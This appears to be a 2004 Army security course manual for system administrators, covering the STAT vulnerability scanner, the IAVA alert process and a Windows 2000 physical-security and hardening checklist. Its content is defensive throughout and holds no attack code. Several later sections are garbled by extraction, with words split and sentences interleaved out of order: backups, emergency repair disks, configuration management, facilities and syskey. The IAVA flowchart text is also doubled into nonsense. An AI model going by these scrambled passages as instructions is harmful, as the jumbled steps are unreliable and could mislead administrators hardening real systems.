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Course Information

Title
System Administrator / Network Manager Security Course, 
course number 7E-F66/531-F21 (CT)

Location
Office: Information Assurance, Room 205, Cobb Hall, 
Building 25801, Fort Gordon, GA 30905
Phone: (706) 791-5137/5179, DSN 780, Fax 791-6161
Email Address: ia@gordon.army.mil
Web site: http://ia.gordon.army.mil

Telephone
Military phones: To dial out from the military phones, dial “9” 
for local and 800 numbers.   To dial DSN, dial “8”.  No 
phones can dial long distance.
Other numbers: TSACS 791-4291, 1-800-632-0196

 
September 10, 2004 1-1

Your Staff

Mr. Randy McNeil – Chief, IA Training
Instructors

Mr. Larry McLean (NMS)  Mr. Paul Gozaloff (NMS)
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Course Objective
Week 1

To train DOD personnel to recognize vulnerabilities and 
defeat potential threats within the computer system; identify 
and repair common Windows 2K and UNIX operating system 
weaknesses and identify approved free security-based 
software

Week 2
To train DOD personnel to recognize vulnerabilities and 
defeat potential threats within the network; operate and 
maintain firewalls using routers and bastion hosts and a 
simple web server Microsoft Internet Information Server (IIS)
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Ground Rules

Course materials are yours
Ask questions any time
Respect opinions of others
Products mentioned or demonstrated, not endorsed
Logistics and break schedule (smoking area, class 
hours, restrooms, phones & messages)
Do not hack your fellow students!!!
Cell phones are prohibited in class
IASO Level 1 Security Course is a prerequisite to this 
course
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Student Introductions

Name
Where you work; unit & location
What you do; not just the job title
What you expect to learn
What is your computer background
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Course Outline

Day 1
Introduction
STAT Scanner and IAVA discussion
Security Introduction
Physical Security
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Course Outline

Day 2
System Security 
Network Security

Day 3
Account Security 
Auditing and Logging
Begin Unix Security Check List and Lab Work

Day 4
Continue with Unix Security Check List and Lab Work
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Course Outline

Day 5
Finish Unix Security Check List and Lab 
Work
Exam (50 multiple choice questions, 1 
hour, closed book/notes, 80% to certify)
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Course Outline

Day 6
ACERT Brief /Network Vulnerabilities
Military Intelligence Brief 

Day 7
Encryption
Web Server Vulnerabilities 
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Course Outline

Day 8
Router Security 

Day 9
Firewall Security 

Day 10 
Intrusion Detection Systems

Exam (50 multiple choice questions, 1 hour, closed 
book/notes, 80% to certify)
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Security Threat Avoidance Technology
And

IAVA Process

STAT
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• A software product that performs a complete security
vulnerability and analysis of your Windows NT 4.0,
Windows 2000, and UNIX networks

– Uses a unique database of over 2,913 Windows 
NT®/Windows 2000®, Cisco Routers, HP Printers,       

Linux, Red Hat and UNIX® vulnerabilities 
(similar to a virus scanner in operation)

– Vulnerabilities detected can be fixed using the 
AutoFixTM feature

Harris STAT Scanner
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• Windows 2000/NT 4.0 with SP 3 (or higher)

• Microsoft TCP/IP, NetBEUI, or IPX/SPX protocols 

• Microsoft Data Access Component 2.5 or  later

• Internet Explorer 4 (or higher)

• SSH protocol 1.5, 1.99, or 2.0 is required on UNIX systems

Minimum Software Requirements
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Minimum Hardware Requirements

• PC or compatible:
– Pentium 133 MHz (or higher) processor
– 64 MB of RAM (128 recommended)                              
– 800 x 600 monitor resolution
– Hard drive with 40 MB of free space
– CD-ROM drive or Internet connection
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• For a full local vulnerability analysis, the user must be
logged on with an account that has local administrator 
privileges

• To perform an analysis of other machines on the network,
the user must be logged on with an account that has
domain administrator privileges

• To analyze Windows 2000/NT workgroups, the
user must have administrator privileges on every machine 
to be scanned. 

Administrative Requirements
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• You need CSLA authorization to use this tool.

• POC is Julia Conyers-Lucero @ FT Huachuca
DSN 879-8259, COMM (520) 538-8259
E-Mail julia.conyers.lucero@csla.army.mil

• Need to pass training/testing 1st. Test site is online at 
Https://iatraining.us.army.mil

• Once authorized, you must update STAT’s vulnerabilities 
database often. (usually every 1-2 wks)

Administrative Requirements
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Getting Around in STAT 
Scanner
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The IP field displays the 
IP address of the 
computer that is selected 
in the Machine List.

The OS (Operating System) 
field displays the operating 
system of the computer that 
is selected in the Machine 
List.

The Configuration File area of 
the STAT Scanner Main screen
displays the current configuration 
(*.dat) file being used by the 
program. The default 
configuration file is vcid.dat.

The Name field displays 
the name of the computer 
or domain that is selected 
in the Machine List.

Header
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Vulnerability List
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Machine Menu
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Machine Selection Wizard
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Machine List
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Load Configuration From File 

Select the Configuration 
(*.dat) file to be used.
Click Open.

Under the Configurations menu, 
select Load Configuration From 
File. The Open display appears.

The file that is loaded is now the Current 
Configuration. STAT Scanner will assess the selected 
machines for only the vulnerabilities contained within 
the selected file.
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Risk Levels

Vulnerabilities are classified in five different levels of risks:

High - Grants unauthorized administrative access or privilege 
elevation to System or Administrator level.

Medium - Grants unauthorized access or serious denial of service.

Low - Potential to grant unauthorized access or denial of service.

Warning - Recommended for good security practices.

Unable To Assess - STAT Scanner cannot assess the 
vulnerability.
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Vulnerabilities
General Tab
The General Tab provides a detailed 
description of a particular 
vulnerability, including any specific 
information (such as registry key or 
policy setting) and detailed solution.

More Info Tab
The More Info Tab provides additional information on a 
particular vulnerability, such as type of vulnerability, 
application, and web links if available.
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V
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Lesson Review

• Introduction to STAT Scanner
• Getting Around in STAT Scanner
• Selecting machines to scan
• Configuration of Vulnerabilities for scan
• Scanning 
• Results of the scan 

 

ulnerabilities Cont…
Advisories Tab
The Advisories Tab provides a 
security advisory, if available, 
for a particular 
vulnerability. Advisories include 
Microsoft Security Bulletins, 
CERT Advisories, CIAC
Bulletins, as well as other security 
advisories.

Knowledge Base Tab
The Knowledge Base Tab provides the 
Microsoft Knowledge Base article's, 
if any, associated with a particular vulnerability
such as type of vulnerability, application, and web links if 
available
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W2K System Security 

Practical Exercise SAS 2A 
EXERCISE A 
 
This practical exercise will provide hands-on experimentation with the STAT scanner. On the W2K server please logon 
local as the Administrator and perform the following: 
 
Check for vulnerability on your local machine. 
 
1. Start the STAT application. Double click on the STAT icon on your desktop. 
 
2. Close the read me screen if it is displayed. 
 
3. Close tip of the day screen if it is displayed. 
 
4. Change the configuration, from the STAT scanner main screen select: 
      Configuration > Load configuration from file 
      This open display allows you to select various types of categories to examine or autofix. 
      Select IE.dat >click on open 
      On your STAT main screen, the configuration File should now read IE.dat (Upper left  
      corner.)  
 
5.  Perform an Analysis, from the console menu select:  

Analysis > Perform an Analysis or select the red sign wave icon on your toolbar. You may see the “Scan Ports & 
Services Screen. Leave defaults and hit scan. Click ok on warning banner. Note: If IE6 is installed with all hotfixes 
no vulnerabilities should be found. Faults will be found in the right window. For classroom purposes, DO NOT 
FIX THE ID# W0064 “FAT FILE SYSTEMS EXISTS.”  It is needed for our Ghost version. 

         
6.  Change the configuration file setting to C2.dat and perform an analysis. The Replace/Append dialog box will appear 
if there is at least one scan already completed. Click Replace; note all the high and low risk vulnerabilities. 
 
7. Change the configuration file setting to all.dat and perform an analysis. Click Replace. Note: Your machine should 
display numerous vulnerabilities. Scan down the list and locate ID # W0149. (if not there, pick a couple others)  
 
8. What type of vulnerability does it display? 
 
 
9. Could this vulnerability be auto fixed? 
 
 
10.Scan other machines in your subnet. 
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11.  From the STAT scanner main screen select: 
              Machines > Select Machines… Also ensure the block “Automatically Test for Admin Rights” is selected. 
 
12. The Machine list menu will be displayed. Find Machines to scan will open the Machine selection Wizard. Select: 
              IP Range Selection… 
              (Select a range of two computers that will include your machine and that of the neighbor within your domain.)  
              Starting IP Address 147.51.217.xxx  (Instructors will inform of IP Addressing scheme for each site) 
              Ending IP Address 147.51.217.xxx  
              Click on Next 
               (Standby while your computer does a search) 
              Click on OK          
 
13. Select the two computers that are now present on the Machine Selection Wizard and add them 
              to the computers currently selected. Close the wizard by hitting Finish. Save and close.          
 
14. From the STAT scanner main screen: Highlight one computer hold down the shift key and select the other 
             computer. Perform an analysis using the steps you learned above. Use the all.dat file. 
 
15. You should see all of the vulnerabilities that the scanner performed on the machines on the right pane, or  
              you could select each machine from its tab on the bottom and examine each machine's vulnerability. 
         
16. Take ten minutes to view some of the vulnerabilities that were found by the STAT scanner. 
 
17. Wait for instructor review. 
 
 

Exercise B 
 
Creation of custom IAVA configuration files 
 
A.  In version 5.222+ of STAT Scanner, the IAVA numbers are available in the configuration 
editor.  This allows you to more easily create a custom IAVA scan file. 
Perform the following steps: 
 

1. open STAT Scanner 
2. select [configuration] [new configuration] 
3. On the left hand side of the editor, scroll to the right and find the ACERT IAVA ID. 
4. click on the top of the column to sort on the ACERT IAVA ID 
5. select desired IAVAs and click the [>>] button 
6. click [save] and give it  file name (IAW LSOP), click [save] 
7. click [close] 
8. select [load configuration from file….] select [newly created file] 

Note. 
a. in the Configuration File window verify that the correct file name is loaded 

9. Perform an analysis 
10. Review the vulnerability results, Scan Summary, and Port and Services Report. 

 
 
 

Kelly Larsen
SAS2 Exercise A, step 16: Access was allowed to the folder.


IA
New feature in STAT Scanner 5.22+;
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B. Lets look at the procedures to run a single scan that will verify if your Anti-Virus 
DAT files are out of date and then create a custom configuration DAT file: 
 
 

1. Open STAT Scanner 
2. select [configuration] [new configuration] the configuration display appears 
3. From the [available checks] window of the configuration display, select the following 

vulnerabilities by clicking on it with the mouse.  (hint: hold the ctrl key to select multiple 
vulnerabilities at once and look in the Category Column for Anti-Virus) 

 
W1142 McAfee (Network Associates)    Medium 

 W1986 Norton (Symantec)        Medium  
 W1999 Trend (PC-cillian) 
 

Also add to the new custom configuration file: 
 
 W1983 Spyware Detection 
 W1985 Warning Network/Monitor Sniffer 
 W1798 LastLogon username 
 

4. The vulnerabilities selected will be moved to the selected check column.  If you accidentally 
added a check by mistake remove by selecting << option. 

5. click [save] and give it  file name (IAW LSOP) 
6. click [close] 
7. select [load configuration from file….] 
8. select the newly created file  
9. scan your network 

 

Additional Information: 
The Department of the Army CIO/G-6 IAVA training site is in development. The first training 
modules available from this site are Harris Stat Training Modules. There are 3 modules for the 
Harris Stat training. You must register a User ID and Password for this site before being allowed 
access to the training modules. (http://iatraining.us.army.mil) 
STAT Scanner has published a STAT-IAVA cross-reference file. This file does not need to be 
requested and is available to any Army user with a licensed copy of STAT Scanner. The file may 
be downloaded from RCERT CONUS or from the STAT Premier Web Site, which is the same 
location for downloading program updates. 

 

 

 

To download the IAVA mapping file from the Premier Web Site: 
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1. Go to RCERT CONUS at www.rcert-c.army.mil/stat_index.html (you must be at a .mil site) or 
https://premier.harris.com/stat/ 
2. Login (depends on download site) 
3. Locate and Select "STAT Scanner - Army IAVA Configuration File" This is the configuration 
file with the list of vulnerabilities the STAT program will use. 
4. Locate and Select "army_iava_stat_scanner_vuln_mapping_1-27-03.pdf" (The name of the file 
will change slightly each time it is released to reflect the date of most current release). This is for 
your reading enjoyment. 
5. Done. 
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Army Information Assurance 
Vulnerability Alert Process

ACERT  MSG 
via 

LISTSERVER 
and GENSER 

ACERT  MSG ACERT  MSG 
via via 

LISTSERVER LISTSERVER 
and GENSER and GENSER 

DISA MSGDISA MSGDISA MSG

MACOM 
Suspense to 
acknowledge 

receipt 

MACOM MACOM 
Suspense to Suspense to 
acknowledge acknowledge 

receipt receipt 

AVG of 5 to 7 
working days

DISC4 directedDISC4 directedDISC4 directed

Reported case of 
NEW VIRUS

Reported case of Reported case of 
NEW VIRUSNEW VIRUS

Vendor  identified 
vulnerabilities

Vendor  identified Vendor  identified 
vulnerabilitiesvulnerabilities

CERT identified issuesCERT identified issuesCERT identified issues

Incident  / Intrusion AnalysisIncident  / Intrusion AnalysisIncident  / Intrusion Analysis

MACOM 
Suspense for 

100% 
compliance  

MACOM MACOM 
Suspense for Suspense for 

100% 100% 
compliance  compliance  

AVG of  14 to 30 
working days

RCERTs AOR 
Validation 

RCERTs AOR RCERTs AOR 
Validation Validation 

TNOSC

Network 
validation 

TNOSCTNOSC

Network Network 
validation validation 

TotalTotalTotal
Risk ManagementRisk ManagementRisk Management

NoneNoneNone

T
R
I
G
G
E
R
S

TT
RR
II
GG
GG
EE
RR
SS

DISC4DISC4
MACOMSMACOMS

ACERTACERT

CENTRALLY   CENTRALLY   
MANAGEDMANAGEDDISTRIBUTED DISTRIBUTED 

VISIBILITYVISIBILITY

DCSOPSDCSOPS
INTERNET

Verification and ValidationVerification and Validation

ACERT maintains MACOM reporting
Compliance

ACERT Web Page 
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System Administrator/Network Manager 
Security Course

W2K Security Introduction
Module 3
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Win2K Security Features

• ^Policy Editor is still your friend
– System Polices are replaced with Group Policies
– Changes are easily reversed

• IntelliMirror
– Control to W2K Pro systems
– Defines policies based on respective user’s business 

roles, group memberships and locations
• Active Directory

Group
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Win2K Security Features
(cont)

• Multiple Authentication Protocols
• Certificate Services
• IP Security Extensions (IPSec)
• Transport Layer Security (TLS) & Secure Socket Layer 

(SSL)
• Disk Quota Support
• Encrypting File System (EFS)
• Kerberos
• Layer 2 Tunneling Protocol (L2TP)
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Win2K Security Issues

• More complex then other versions of Windows
• 3rd party software incorporated into OS

– IPSec, Kerberos
• Trust is transitive

– Implicit
– Explicit
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Win2K Features or Issues ?

• Automatic Log-on Support 
• Indexing Service
• Single Sign-on

– Directory information can be accessed by various operating 
systems

– Allows users the ability to access files, printers, web services with 
one sign-on

• Kerberos Support
– MS version of Kerberos
– Win2K networks only
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W2K Architecture Overview

POSIX
subsystem
POSIX

subsystem
User mode
Kernel mode

Win32 
Subsystem
Win32 

Subsystem
O/S 2

subsystem
O/S 2

subsystem
Integral

subsystem
Integral

subsystem

Executive ServicesExecutive Services

I/O Manager

File 
Systems

Cache 
Manager

Virtual
Memory
Manager

Process
Manager

Plug & Play 
Manager

IPC
Manager

Security
Reference
Monitor

Window
Manager

Graphics
Device
drivers

Power
Manager

POSIX
Applications

Win32
Application

OS/2
Application

Device DriversDevice Drivers

Hardware Abstraction Layer (HAL)Hardware Abstraction Layer (HAL)

HardwareHardware

Object ManagerObject Manager

MicroKernelMicroKernel

Executive

Environment 
subsystems

Integral 
subsystems
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W2K Security Architecture
Components

• Security Reference Monitor (SRM)

• Local Security Authority (LSA)

• Logon Process

• Graphical Identification and Authentication (GINA) 

• Network Logon Service

• Security Packages

• Security Support Provider Interface (SSPI)

• Security Account Manager (SAM)

• Active Directory (AD)
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Root Key
(Subtree)

Key

Subkeys

Value Entry

The Registry Structure
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Regedit.exe 

Vulnerability Countermeasures 
Regedit.exe may be found 
associated with registry 
files. An attacker can mail 
or place a .reg registry file 
on the system, causing it to 
modify the registry when 
the file is run.  

� 1. Associate the .reg file name extension with a text editor. 
• Go to control panel and double click on “Folder Options”. 
• Click on “File Types” tab. Drill down till you find “REG 

Registration Entries”. 
• Highlight and click on change. Drill down till you find 

Notepad. 
• Highlight Notepad and click on OK. 
• . reg will now be associated with Notepad. 

 
� 2. Modify the registry with the following entry. 

• Run regedt32.exe 
• Go to the 

HKEY_LOCAL_MACHINE/Software/Classes/regfile/shell
/open/ 

               command key. 
• Double-click the value that is similar to : REG_SZ : 

regedit.exe %1 to display the String Editor. 
• Change the regedit.exe entry to notepad.exe. DO NOT 

ALTER any portion of the string. 
• Click OK. 

 
Note: After completing the association, if a .reg file appears in your 
text editor, then an attack may be in progress to compromise your 
system. 
 
References: Microsoft Knowledge Base Article Q132664 
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Registry Hives
The Registry Hives map directly to operating system files
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Registry Editors

WARNING!
Incorrect use of the Registry Editor can cause 
serious, system wide problems that may require 
the reinstallation of Windows 2000.
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3-2

System Administrator/ Network Manager
Security Course

W2K Checklist 
Physical Security
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Control Server Access

• Access by unauthorized personnel could result 
in 
– theft of peripherals,
– denial of service,
– security overrides via removable media,
– miscellaneous tampering.

• Remember that there is NO security without 
Physical Security.  Control the keys and
control the access

 
 
Server Access 

Vulnerability Countermeasure 
Physical access by 
unauthorized personnel 
could result in theft of 
peripherals, denial of 
service, security 
overrides via 
removable media, or 
miscellaneous 
tampering. 
Remember that there is 
NO security without 
Physical Security.  
Access to the interior 
of the CPU case 
exposes the computer 
to theft, sabotage, and 
reconfiguration. 

� 1. Place the server in a locked room accessible only by the 
System Administrator. 
• Maintain a list of personnel authorized entry 
• Establish key/access control. 

 
� 2. PHYSICALLY lock the CPU case 
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3-1

Input/Output devices

• Connected peripheral devices provide easy access 
for the would be hacker.  

• Removal of unneeded input devices prevents any 
one from causing the system to execute programs 
or loading software.
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Manage your CMOS

• Alter your boot-up sequence so that removable 
media can not be used for boot up.

• Establish a CMOS password to protect your 
settings

• Lock the computer case to prohibit removal of the 
CMOS battery and resetting of the CMOS 
password.

 
 

Input/Output Devices 
Vulnerability Countermeasure 

If your system has 
peripheral devices 
connected, then it will 
not take an attacker 
long to gain access.  
Removal of input 
devices prevents any 
one from causing the 
system to execute 
programs or load 
software. 

� 1. Remove the Keyboard, mouse, and monitor, if possible. 
 

 

Check equipment for unauthorized attached devices 
Vulnerability Countermeasure 

Devices can be attached to 
equipment which can record 
network transmission, 
keystrokes, or other 
information 

� 1.  IT equipment should not have any attached equipment 
or connections that are unknown to the system 
administrator.  Check network transmission lines for 
additional devices.  Check USB, serial, and parallel ports 
for attached equipment. 

 

Smart Card Readers 
Vulnerability Countermeasure 

Equipment must be in place 
before advanced 
authentication methods can 
be utilized. 

� 1.  Install Smart Card readers to enable advanced 
authentication techniques. 
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Boot Sequence 

Vulnerability Countermeasures 
An operating system can be 
rebooted using removable 
media.  Once rebooted, the 
operating system can be 
modified or reinstalled, 
overriding password 
controls.  

� 1. CHANGE the Boot sequence (in 
the CMOS).   

• Change boot sequence to Hard drive, 
CDROM, then Floppy.  For complete 
safety, change it so only the hard 
drive is available for boot. 

Note: 
• Most personal computers today can start a number of 

different operating systems. For example, if  normally 
Windows 2000 is started from the C: drive,  another 
version of Windows could be selected from another 
drive, including a floppy drive or CD-ROM drive. If 
this happens, security precautions taken within the 
default version of Windows 2000 might be 
circumvented.  

• In general, install only those operating systems required. For a 
highly secure system, this will probably mean installing one 
version of Windows 2000 and ensuring that all partitions are 
NTFS volumes.   

 
CMOS Passwords 

Vulnerability Countermeasures 
Access to the CMOS 
enables changing of the 
boot sequence order.  
Changing the boot sequence 
can enable reboot via 
removable media. 
 

� 1. INSTALL a CMOS password. 
 

 

Hard drives 
Vulnerability Countermeasure 

It is trivial to take the 
hard drive from one 
system and read it on 
another. Hard drives 
are the goal of any 
attacker who has 
physical access to your 
system. 

� 1. Physically lock the CPU case. 

 
Removable Media 

Vulnerability Countermeasure 
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AutoPlay begins reading 
from a CD-ROM drive as 
soon as media is inserted in 
the drive. As a result, the 
setup file of programs and 
the sound on audio media 
starts immediately. This 
could lead to introduction of 
viruses and malicious code. 
 
 
Note:
For more info go to 
Microsoft Knowledge 
Base and lookup 
Q155217. 
 

� 1. Disable Automatically Running CD-ROMs. By default, 
AutoPlay is disabled on removable drives, such as the floppy 
disk drive (but not the CD-ROM drive), and on network 
drives. 

• Click Start, click Run, type regedit in the Open box, 
and then press ENTER. 

• Locate and click the following registry key: 
                   
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\CDRom 
 
• To disable automatically running CD-ROMs, change the 

Autorun value to 0 (zero). To enable automatically 
running CD-ROMS, change the Autorun value to 1. 

• Restart your computer. 
 
Additional Information
 
There are two other registry keys that can affect this 
functionality: 
 
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer 
NoDriveTypeAutoRun = 0x00000095 
 
 
-and- 
 
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows
\CurrentVersion\Policies\ExplorerNoDriveTypeAutoRun 
= 0x00000095 
 
 
Alternate method using the MMC. 
 
• Disable Automatically Running CD-ROMs by snapping 

in the Group Policy utilizing the MMC.  
• Expand the Local Computer Policy, Computer 

Configuration, and Administrative Templates folders, till 
you can click on the System folder. 

• Double click on Disable AutoPlay, then click on enable. 
Choose Disable AutoPlay on CD-ROM drives or in the 
dropdown box choose All Drives. 

• Click on Apply   
 
Note: 
 



PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-23 

• By default, AutoPlay is disabled on removable drives, 
such as the floppy disk drive (but not the CD-ROM 
drive), and on network drives. If you enable this policy, 
you can also disable AutoPlay on CD-ROM drives, or 
disable AutoPlay on all drives. This policy disables 
AutoPlay on additional types of drives. You cannot use 
this policy to enable AutoPlay on drives on which it is 
disabled by default. This policy appears in both the 
Computer Configuration and User Configuration folders. 
If the settings conflict, the setting in Computer 
Configuration takes precedence over the setting in User 
Configuration. A Media Change Notification (MCN) 
message from the CD-ROM drive triggers AutoPlay. If 
the Windows interface does not receive this message, 
AutoPlay does not operate, regardless of the value of this 
entry. Entries that suppress the MCN message, such as 
Autorun and AutoRunAlwaysDisable also disable 
AutoPlay. 

 
 

3-1

Protect Unattended Workstations

• Utilize passwords with your screen savers

• Lock your workstation or log out when leaving 
your workstation for any period of time.

 
 
Lock Workstations  

Vulnerability Countermeasures 
If workstation consoles 
are left unattended and 
not secured, 
unauthorized personnel 
could access the 

� 1. LOCK your workstation/console whenever a 
workstation/console is left unattended. 
•  

Press <Ctl>, <alt> <del> simultaneously.  The default is 
“Lock Workstation”, then hit Enter 
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workstation and the 
associated network. 
system. 

•   
� 2. Here is how you create a shortcut to lock a computer 
without using the "Ctrl, Alt, Del" keys. 
• Start Windows Explorer.   
• Navigate to \%userprofile%\application 

data\microsoft\internet explorer\quick launch (e.g., 
C:\documents and settings\john\application 
data\microsoft\internet explorer\quick launch). 

• Right-click in the right-hand pane and select New, 
Shortcut. 

• Enter "rundll32.exe user32.dll,LockWorkStation" 
without the quotes and click Next. 

• Name the shortcut "Lock Workstation" and click Finish. 
• To change the icon highlight the following text and 

select the appropriate icon. 
• Select the icon shortcut you just created. 
• Right click and select properties. 
• Select "Change Icon" in the lower right corner. 
• Select the following text: 

%SystemRoot%\system32\SHELL32.dll and paste the 
text in the "File  Name" box.  Select "OK" and "OK". 

• If you want to place the icon in the System Tray drop and 
drag the icon to the position desired.  Delete the icon on 
the desktop. 

 
 

 
Screen Saver Passwords 

Vulnerability Countermeasure 
If a workstation is left 
unattended and the screen 
saver is not password 
protected, unauthorized 
personnel could access the 
workstation and the 
associated network. 
 
 

� 1.   IMPLEMENT a Screen Saver Password  
• Right click on the desktop background 
• Select properties 
• Select the "Screen Saver" tab. 
• Choose a screen saver from the screen saver drop down 

menu.  Make sure you choose one that enables the 
"password protected"  

• Check the password protected box.  Your Windows 2000 
password will now grant you access should the screen 
saver engage. 

• Set the wait time so that the screen will engage in 10 
minutes or less.  A specified period of 3-5 minutes of no 
activity is recommended. 

• Click on the apply button and close the display properties 
window 
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Develop a Backup Strate

nnel fo

ystems and
ne the type o

d up data o
• Test the backup plan
• Provide training for th
• Document all backu

procedures

 
 
Backups  

gy

• Identify perso
group

• Identify S
• Determi
• Store backe

r members of Backup Operators 

 data
f backup 

ff site
 and backup data

ose performing backups
p requirements and

Vulnerability  Countermeasures
Since backup tapes 
contain sensitive 
information from your 
system, to include user 
data, and passwords, 
they become a target 
for anyone who has 
physical access to your 
system. 
 
 

� 1. Ensure the following are addressed in you local IA SOP 
• MA
• P  

yo
•

ad
•

wi
• RESTORE a few files from your backup tapes on a 

ular basis.  This ensures that you have good backup 

at your backup procedures are complete. 
• KEEP your backup tapes under lock and key. 
• Keep written records of key backup and system 

ion information. 
• Store back-up tapes off-site whenever possible. 

� 2. Create an Emergency Repair Disk 
• Click the Start button, Select Programs, Select 

Accessories, Select System Tools, click Backup 
• On the General Tab, click the Create an Emergency 

Repair Disk button. 
• When prompted, insert a blank, formatted 1.44 MB 

KE regular backups. 
 U DATE your backups whenever you update or change

ur system. 
 ENSURE that EVERYTHING on your system is 

dressed in your backup plan. 
 DO NOT reuse a backup tape too many times because it 

ll eventually fail. 

reg
tapes. 

• REBUILD your system from a set of backup tapes to be 
certain th

configurat

• Encrypt back-up tapes whenever possible. 
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disk in the floppy drive and click OK 
• When the process is complete, remove the disk, label 

it “Emergency Repair disk” and then store it in a safe 
location. 

Note: 
Make sure to create an ERD when your computer is 
functioning well so that you are prepared if you need to repair 
system files 

 

Uninterruptible Power Supplies (UPS) 
Vulnerability Countermeasure 

Unexpected power loss can 
compromise security and 
data integrity 

� 1.  Install Uninterruptible power supplies on all critical IT 
systems. 

 

3-1

Emergency Repair Disks

intain an u
ncy R

s.  

Emergency R
ou to repair or r

s 2000. T  
s wit

ector. 

 Repair Disks (ERD

• Make sure that you ma pdated 
Emerge
system

• The 
y
Window
problem
boot s

 
Emergency

epair Disk for all of your critical 

epair Disk (ERD) can help 
ecover a system that can't load 
he ERD helps you repair

h system files and the partition 

 

) 
Vulnerability Countermeasure 

The Emergency Rep
Disk (ERD) provides
the capability to repair 
or recover a system tha
can't load Windows 
2000. The ERD 
provides the capability 
to repair problems with 
system

air 
 

t 

 files and the 

1
ing 

s 

.

� . Repair damaged system with ERD. 
If a system failure occurs, you can start the system us
the Windows 2000 Setup CD or the Windows 2000 
Setup floppy disks which can be created by running 
Makeboot.exe from the Boot disk folder on the Windows 
2000 Setup CD. Then use the Emergency Repair Proces
to restore core system files.  

�2  Re-apply the checklist after a repair to ensure the 
integrity of the security of the system. 
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artition boot sector. 
uation occurs 

corrupted or 
accidentally deleted. 
System files are the 
files Windows 2000 
uses to load, configure, 
and run the operating 
system. If some system 
files are missing or 
corrupted, you can use 
the ERD to repair those 
files. 
 
Note: 

ry using safe mode or 
the Recovery console 

 
Im

p
This sit
when the hard disk fails 
or when some of the 
system files are 

T

before using an ERD. 

portant 
The ERD allows you to make only basic system repairs, 
such as to the system files, boot sector, and startup 
environment. The ERD does not back up data, prog
or the registry and is not a replacement for regular 
system backups. 

• 

rams, 

• 
reg
%S
bec
in this folder to repair your registry without performing a 
full restore of the system state data. This method is 
recommended for advanced users only and can also be 
accomplished by u mmands. 

t
• e urrent configuration information. 

nstallation of 
in r use an ERD 

, the Windows 
d the 

, you 
ions.   

• The Windows 2000 ERD, unlike the ERD used with 
Windows NT, does not contain a copy of the registry 
files. The backup registry files are in the folder 
%SystemRoot%\Repair. However, these files are from the 
original installation of Windows 2000. In the event of a 
problem, they can be used to return your computer to a 
usable state.  
When you back up system state data, a copy of your 

istry files is placed in the folder 
ystemRoot%\Repair\Regback. If your registry files 
ome corrupted or are accidentally erased, use the files 

sing the Recovery Console co
• Because missing or corrupted files are replaced with files 

from the Windows 2000 CD, any changes you made to 
he system after the original installation are lost. 

Th  ERD must include c
Make sure that you have an ERD for each i

omputer, and neveW dows 2000 on your c
from another computer. 

D• To restore your settings from the ER
2000 CD, the Windows 2000 Setup disks, an
ERD are required. During the restoration process
can press F1 for more information about your opt
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Configuration Management

• Maintain an up-to-date listing of 
– systems,
– software versions and patches loaded,
– peripheral devices, and required drivers.

 
Configuration Management 

Vulnerability Countermeasures 
Rebui m 

ed 
 

are not 
always enough. 

� 1.  Document all ha e configurations in a 

d. 

tioning information. 
uirements. 

s. 

lding a system fro
scratch can be complicat
by a lack of documentation. 
Backup tapes/disks 

rdware and softwar
Configuration Management database.  Including but not 
limited to: 
• System architecture 
• Key nodes and connections identifie
• Software Inventory  
• Patches and OS versions information 
• BIOS and parti
• Additional device drivers per req
• Document and mark all cables and connection
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Facil

• ur facilities meet your security 
ents

• ssessments
nvironment

• oper securit
ts(ie. tempest,
paration)

 
Facilit

ities

Ensure that yo
requirem
Conduct risk a
physical e

 which address your 

y environment per 
 temperature control, 

Maintain a pr
requiremen
black/red se

 

ies 
Vulnerability Countermeasures 

Improperly m
facil s
service d

P 

lts acceptable or 

• Make sure hardware and software configurations support 

• M n
s

aintained 
itie  can be a source of 

isruption. 

� 1. Ensure the following are addressed in you local IA SO
• Separate black-red communication lines. 
• If TEMPEST requirements apply to the system, has 

TEMPEST testing been accomplished.  
• Are TEMPEST test resu
is the physical control zone 
sufficient.  

• Conduct a physical risk assessment. 
• Is there adequate power or UPS support available. 

the security policy. 
ai tain proper temperatures per manufacturer 

pecifications. 
syskey 

Vulnerability Countermeasures 
To provide greater 
level of protection for 
master keys and 
various other secrets 
use the system key. 
The system key 
protects the following 
sensitive information: 

� 1  
by defa  
comput
random  
memor  to 
unlock ee ways to 
con

• uter-generated random key as the system 

. For all computers in a domain, the secret key is enabled
ult and all master keys and protection keys stored on a
er are encrypted with the unique 128-bit symmetric 
 system key. The system key must be in volatile
y on the operating system during system startup
 the password protection key. There are thr

figure the system key for computers: 

Use a comp
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• Master keys 
that are used to 
protect private 
keys  

• Protection keys 
for user account 
passwords 
stored in Active 
Directory  

• Protection keys 
for passwords 
stored in the 
registry in the 
local Security 
Accounts 
Manager 
(SAM) registry 
key  

• Protection keys 
for LSA secrets  

• The protection 
key for the 
administrator 
account 
password that is 
used for system 
recovery startup 
in safe mode  

 

ocal system by using a 

 the 
 

e it on 
ppy disk. The system key is not stored anywhere 

ust be 

sword is not stored anywhere 

 
key. 

e a member of the 
Do n
com t
to run syskey. You can configure the system key differently 
for e domain. 
System
but u
for various com
ena or stand-alone computers. 

t already selected, click Encryption 
abled, and then click OK. After a reminder that 

 

key and store it on the l
complex obfuscation algorithm that scatters the 
system key throughout the registry. This option allows 
you to restart the computer without having to enter
system key. This is the default configuration for the
system key.  

• Use a computer-generated random key, but stor
a flo
on the local computer, and the floppy disk m
inserted for the system to start. It is inserted when 
prompted after Windows 2000 begins the startup 
sequence, but before it is available for users to log on 
to the system.  

• Use a password chosen by the administrator to derive 
the system key. The pas
on the computer. Windows 2000 prompts the 
administrator for the password when the system is in 
the initial startup sequence, but before the system is 
available for users to log on.  

The system key configuration options are available from the
system key dialog boxes that appear when you run sys
For computers in a domain, you must b

mai  Admin group to run syskey. For stand-alone 
pu ers, you must be logged on as the local Administrator 

each computer in th
 key protection is enabled by default in each domain, 

yo  might want to change the default system key option 
puters in a domain. You also might need to 

ble system key protection f

To configure system key protection 

1. Type syskey at the command prompt. This brings up 
the dialog box. After system key protection is 
enabled, it cannot be disabled. 

2. If it is no
En
you should create an updated emergency repair disk,
you are presented with options for the Account 
Database Key.  The default option is a system-
generated password that is stored locally. 

3. Select the system key option that you want, and then 
click OK.  
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 the 
f 

derive the per-user account password encryption key 
that is then used to decrypt the password information 
in Active Directory or the local SAM registry key.  

